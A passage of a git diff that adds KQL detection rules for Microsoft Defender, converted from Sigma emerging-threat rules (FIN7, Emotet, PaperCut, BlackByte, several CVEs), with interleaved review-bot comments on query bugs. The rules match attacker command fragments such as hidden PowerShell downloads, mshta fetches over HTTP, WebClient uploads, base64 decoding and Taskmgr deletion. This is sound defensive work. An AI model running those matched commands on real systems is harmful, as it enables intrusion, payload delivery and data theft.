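Review bot: `ProcessCommandLine matches regex "query\\ssession"` allows exactly one whitespace character between the two words, while the sibling AsperaFaspex rule added in this commit uses `query\\s+session` for the same suspicious-command block; the two rules share that block verbatim otherwise and should agree, or a `query  session` with a doubled space is caught by one and missed by the other. Suggest `ProcessCommandLine matches regex "query\\s+session"` here, matching the `net\\s+user` and `net\\s+group` patterns beside it. If the single `\s` is inherited from the source rule, it is still worth aligning, since the converter output is what analysts will deploy.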
diff --git a/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql
new file mode 100644
index 00000000..4a3312da
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/onyx_sleet_apt_file_creation_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Onyx Sleet APT File Creation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects file creation activity that is related to Onyx Sleet APT activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith ":\\Windows\\ADFS\\bg\\inetmgr.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql
new file mode 100644
index 00000000..0ca57ef2
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_exploitation_related_indicators.kql
@@ -0,0 +1,12 @@
+// Title: PaperCut MF/NG Exploitation Related Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-25
+// Level: high
+// Description: Detects exploitation indicators related to PaperCut MF/NG Exploitation
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /c " and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-nop -w hidden" and ProcessCommandLine contains "Invoke-WebRequest" and ProcessCommandLine contains "setup.msi" and ProcessCommandLine contains "-OutFile") or (ProcessCommandLine contains "msiexec " and ProcessCommandLine contains "/i " and ProcessCommandLine contains "setup.msi " and ProcessCommandLine contains "/qn " and ProcessCommandLine contains "IntegratorLogin=fimaribahundq")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql
new file mode 100644
index 00000000..b11f6a9f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/papercut_mf_ng_potential_exploitation.kql
@@ -0,0 +1,12 @@
+// Title: PaperCut MF/NG Potential Exploitation
+// Author: Nasreddine Bencherchali (Nextron Systems), Huntress DE&TH Team (idea)
+// Date: 2023-04-20
+// Level: high
+// Description: Detects suspicious child processes of "pc-app.exe". Which could indicate potential exploitation of PaperCut
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bash.exe" or FolderPath endswith "\\calc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\pc-app.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql
new file mode 100644
index 00000000..c4b28c6b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/peach_sandstorm_apt_process_activity_indicators.kql
@@ -0,0 +1,12 @@
+// Title: Peach Sandstorm APT Process Activity Indicators
+// Author: X__Junior (Nextron Systems)
+// Date: 2024-01-15
+// Level: high
+// Description: Detects process creation activity related to Peach Sandstorm APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "QP's*(58vaP!tF4"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql
new file mode 100644
index 00000000..19cf9ffb
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_apt10_cloud_hopper_activity.kql
@@ -0,0 +1,12 @@
+// Title: Potential APT10 Cloud Hopper Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-04-07
+// Level: high
+// Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0045, attack.t1059.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".vbs /shell " and FolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "csvde -f C:\\windows\\web\\" and ProcessCommandLine contains ".log")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql
new file mode 100644
index 00000000..7fd5578e
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_exploitation_activity.kql
@@ -0,0 +1,14 @@
+// Title: Potential APT FIN7 Exploitation Activity
+// Author: Alex Walston (@4ayymm)
+// Date: 2024-07-29
+// Level: medium
+// Description: Detects potential APT FIN7 exploitation activity as reported by Google.
+In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.t1059.003, detection.emerging-threats
+// False Positives:
+// - Notepad++ can legitimately spawn cmd (Open Containing Folder in CMD)
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\notepad++.exe") or (FolderPath endswith "\\notepad++.exe" and InitiatingProcessFolderPath endswith "\\rdpinit.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
new file mode 100644
index 00000000..5a68bf77
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql
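Review bot: The second line of the description, `In order to obtain initial access, FIN7 used …`, is emitted without the `//` prefix, so it is not a comment and the file will not parse as a Kusto query. Kusto comments are single-line, so every continuation line of a multi-line Sigma description has to be prefixed: `// In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.` The same unprefixed continuation lines appear in the hunks at L1329, L1330, L1334, L1338, L1339 (KamiKakaBot), L1341, L1343 and L1344, which suggests the description writer in the conversion script only prefixes the first line; fixing it there repairs all of them.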
@@ -0,0 +1,12 @@
+// Title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0046, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-noni -nop -exe bypass -f \\\\" and ProcessCommandLine contains "ADMIN$") or (ProcessCommandLine contains "-ex bypass -noprof -nolog -nonint -f" and ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql
new file mode 100644
index 00000000..8f993f71
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_apt_fin7_related_powershell_script_created.kql
@@ -0,0 +1,10 @@
+// Title: Potential APT FIN7 Related PowerShell Script Created
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0046, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath in~ ("host_ip.ps1") or FolderPath endswith "_64refl.ps1"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql b/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql
new file mode 100644
index 00000000..dfb1022a
--- /dev/null
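Review bot: In the second hunk on this line (potential_apt_fin7_related_powershell_script_created.kql) the first term, `FolderPath in~ ("host_ip.ps1")`, can never match: `in~` is a whole-value comparison and FolderPath holds a full path, not a bare file name, so only the `endswith "_64refl.ps1"` branch of the rule is live. The name match belongs on the file-name column: `| where ActionType == "FileCreated" and (FileName =~ "host_ip.ps1" or FileName endswith "_64refl.ps1")`. The added `ActionType` filter also matters because the description says this is a file creation rule, yet the query runs over every DeviceFileEvents action type; the DeviceFileEvents rules at L1331, L1333, L1334, L1343 and L1344 have the same gap, and since all of them come from Sigma `file_event` rules the converter should add that filter for that category.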
+++ b/KQL/rules-emerging-threats/Execution/potential_apt_mustang_panda_activity_against_australian_gov.kql
@@ -0,0 +1,12 @@
+// Title: Potential APT Mustang Panda Activity Against Australian Gov
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects specific command line execution used by Mustang Panda in a targeted attack against the Australian government as reported by Lab52
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.g0129, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "copy SolidPDFCreator.dll" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\SolidPDFCreator.dll") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "SolidPDF" and ProcessCommandLine contains "C:\\Users\\Public\\Libraries\\PhotoTvRHD\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql
new file mode 100644
index 00000000..caff29fc
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_baby_shark_malware_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Baby Shark Malware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-02-24
+// Level: high
+// Description: Detects activity that could be related to Baby Shark malware
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.discovery, attack.t1012, attack.t1059.003, attack.t1059.001, attack.t1218.005, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell.exe mshta.exe http" and ProcessCommandLine contains ".hta") or (ProcessCommandLine contains "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"" or ProcessCommandLine contains "cmd.exe /c taskkill /im cmd.exe" or ProcessCommandLine contains "(New-Object System.Net.WebClient).UploadFile('http")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql b/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql
new file mode 100644
index 00000000..30c060eb
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential BlackByte Ransomware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects command line patterns used by BlackByte ransomware in different operations
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.impact, attack.t1485, attack.t1498, attack.t1059.001, attack.t1140, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -single " and FolderPath startswith "C:\\Users\\Public\\") or (ProcessCommandLine contains "del C:\\Windows\\System32\\Taskmgr.exe" or ProcessCommandLine contains ";Set-Service -StartupType Disabled $" or ProcessCommandLine contains "powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(" or ProcessCommandLine contains " do start wordpad.exe /p ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql
new file mode 100644
index 00000000..292bd035
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2021_26857_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2021-26857 Exploitation Attempt
+// Author: Bhabesh Raj
+// Date: 2021-03-03
+// Level: high
+// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service
+// MITRE Tactic: Execution
+// Tags: attack.t1203, attack.execution, cve.2021-26857, detection.emerging-threats
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" and (not((FolderPath endswith "wermgr.exe" or FolderPath endswith "WerFault.exe")))
\ No newline at end of file
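Review bot: `FolderPath startswith "C:\\Users\\Public\\"` in the first clause pins the rule to the C: drive, whereas the other rules in this series (for example the exclusions at L1331) match on the drive-independent `":\\Windows\\…"` form. For consistency, and so that a non-default system drive is covered, the same form fits here: `(ProcessCommandLine contains " -single " and FolderPath contains ":\\Users\\Public\\")`. Whether the upstream rule deliberately anchored on C: is not visible here, so this is worth confirming against the source rule before changing.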
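Review bot: In the second hunk on this line (potential_cve_2021_26857_exploitation_attempt.kql) the exclusion `FolderPath endswith "wermgr.exe" or FolderPath endswith "WerFault.exe"` is not anchored on a path separator, so it exempts any image whose name merely ends in those characters rather than the two Windows Error Reporting binaries it is meant to exempt. The sibling rules at L1331 and L1332 anchor the same name as `"\\wermgr.exe"`, and this one should match them: `and (not((FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\WerFault.exe")))`. The stray `|` in the middle of the description line (`by looking for | abnormal subprocesses`) looks like a leftover from the YAML block scalar and would be worth dropping in the same pass.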
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql
new file mode 100644
index 00000000..dff1e1b2
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2021-40444 Exploitation Attempt
+// Author: Florian Roth (Nextron Systems), @neonprimetime
+// Date: 2021-09-08
+// Level: high
+// Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, cve.2021-40444, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\control.exe" and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) and (not((ProcessCommandLine endswith "\\control.exe input.dll" or ProcessCommandLine endswith "\\control.exe\" input.dll")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
new file mode 100644
index 00000000..f4a71b7c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql
@@ -0,0 +1,14 @@
+// Title: Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
+// Author: @kostastsale
+// Date: 2022-04-25
+// Level: medium
+// Description: Detects potential exploitation attempt of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager.
+As reported by Morphisec, part of the attack chain, threat actors used PowerShell commands that executed as a child processes of the legitimate Tomcat "prunsrv.exe" process application.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1059.006, attack.t1190, cve.2022-22954, detection.emerging-threats
+// False Positives:
+// - Some false positives are possible as part of a custom script implementation from admins executed with cmd.exe as the child process.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\prunsrv.exe" and ((ProcessCommandLine contains "/c powershell" and FolderPath endswith "\\cmd.exe") or FolderPath endswith "\\powershell.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql
new file mode 100644
index 00000000..1e55dc25
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql
@@ -0,0 +1,13 @@
+// Title: Potential CVE-2022-29072 Exploitation Attempt
+// Author: frack113, @kostastsale
+// Date: 2022-04-17
+// Level: high
+// Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.
+7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.
+The command runs in a child process under the 7zFM.exe process.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2022-29072, detection.emerging-threats
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\7zFM.exe") and (not((((ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r ") or (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".cmd" or ProcessCommandLine endswith ".ps1")) or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql
new file mode 100644
index 00000000..892d98cf
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
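Review bot: The exclusion ends with `isnull(ProcessCommandLine)`, which is the literal translation of the Sigma `CommandLine: null` filter, but Defender's process events generally report a missing command line as an empty string rather than a null, so that branch of the filter is unlikely ever to be true and events without a command line would still be raised. `isempty(ProcessCommandLine)` covers both the null and the empty-string case and is the usual idiom for this column: `… or isempty(ProcessCommandLine))))`. The converter presumably emits `isnull` for every Sigma null-valued field, so the change belongs in the backend's null handling rather than in this one file.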
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: high
+// Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+
+DeviceFileEvents
+| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\$WinREAgent\\" or FolderPath contains ":\\Windows\\servicing\\LCU\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\" or FolderPath contains ":\\Windows\\SoftwareDistribution\\Download\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
new file mode 100644
index 00000000..901f562f
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: high
+// Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\wermgr.exe" and (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "powershell_ise.EXE", "powershell.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
new file mode 100644
index 00000000..fb1edcad
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql
@@ -0,0 +1,10 @@
+// Title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-23
+// Level: medium
+// Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-36874, detection.emerging-threats
+
+DeviceFileEvents
+| where (FolderPath contains ":\\ProgramData\\Microsoft\\Windows\\WER\\ReportArchive\\" and FolderPath endswith "\\Report.wer") and (not((FolderPath contains "\\ReportArchive\\AppCrash_" or FolderPath contains "\\ReportArchive\\AppHang_" or FolderPath contains "\\ReportArchive\\Critical_" or FolderPath contains "\\ReportArchive\\Kernel_" or FolderPath contains "\\ReportArchive\\NonCritical_")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
new file mode 100644
index 00000000..8f7633e4
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_cve_2024_3400_exploitation_palo_alto_globalprotect_os_command_injection_file_creation.kql
@@ -0,0 +1,14 @@
+// Title: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled.
+As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-3400, detection.emerging-threats
+// False Positives:
+// - The PAN-OS device telemetry function does not enforce a standard filename convention, but observations are unlikely.
+
+DeviceFileEvents
+| where (FolderPath contains "{IFS}" or FolderPath contains "base64" or FolderPath contains "bash" or FolderPath contains "curl" or FolderPath contains "http") and FolderPath startswith "/opt/panlogs/tmp/device_telemetry/"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql b/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql
new file mode 100644
index 00000000..d029b8b8
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_emotet_activity.kql
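Review bot: This rule filters on `FolderPath startswith "/opt/panlogs/tmp/device_telemetry/"`, a path on a PAN-OS appliance, but it is emitted against `DeviceFileEvents`, which only contains events from hosts running the Defender sensor; unless the deployment has some way of landing appliance file telemetry in that table, the query can never return a row and will look healthy while detecting nothing. If the conversion script cannot map the upstream log source to a Defender table it would be better to skip the rule (or emit it with a header comment such as `// NOTE: source log is PAN-OS device telemetry, not covered by DeviceFileEvents`) than to produce a silently dead query. Whether such a mapping exists in this environment is not visible here, so this is a question for the author rather than a certain defect.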
@@ -0,0 +1,12 @@
+// Title: Potential Emotet Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-09-30
+// Level: high
+// Description: Detects all Emotet like process executions that are not covered by the more generic rules
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or ProcessCommandLine contains "JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ" or ProcessCommandLine contains "QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA" or ProcessCommandLine contains "kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA" or ProcessCommandLine contains "IgAoACcAKgAnACkAOwAkA" or ProcessCommandLine contains "IAKAAnACoAJwApADsAJA" or ProcessCommandLine contains "iACgAJwAqACcAKQA7ACQA" or ProcessCommandLine contains "JABGAGwAeAByAGgAYwBmAGQ" or ProcessCommandLine contains "PQAkAGUAbgB2ADoAdABlAG0AcAArACgA" or ProcessCommandLine contains "0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA" or ProcessCommandLine contains "9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA") and (not((ProcessCommandLine contains "fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ" or ProcessCommandLine contains "wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA" or ProcessCommandLine contains "8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql
new file mode 100644
index 00000000..83716e84
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql
@@ -0,0 +1,10 @@
+// Title: Potential Exploitation Attempt From Office Application
+// Author: Christian Burkard (Nextron Systems), @SBousseaden (idea)
+// Date: 2022-06-02
+// Level: high
+// Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, cve.2021-40444, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "../../../.." or ProcessCommandLine contains "..\\..\\..\\.." or ProcessCommandLine contains "..//..//..//..") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
new file mode 100644
index 00000000..c60da680
--- /dev/null
+++ b/KQL/rules-emerging-threats/Execution/potential_exploitation_of_cve_2024_3094_suspicious_ssh_child_process.kql
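Review bot: The description names two vulnerabilities, CVE-2022-30190 (MSDT) and CVE-2021-40444 (MSHTML), but the Tags line carries only `cve.2021-40444`, so anyone filtering the rule set by CVE tag will miss this rule for the MSDT case. The tag line should list both: `// Tags: attack.execution, attack.defense-evasion, cve.2021-40444, cve.2022-30190, detection.emerging-threats`. If the upstream rule itself only tags one CVE, this is a header inconsistency worth fixing upstream rather than only in the converted copy.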
@@ -0,0 +1,13 @@
+// Title: Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process
+// Author: Arnim Rupp, Nasreddine Bencherchali, Thomas Patzke
+// Date: 2024-04-01
+// Level: high
+// Description: Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2024-3094, detection.emerging-threats
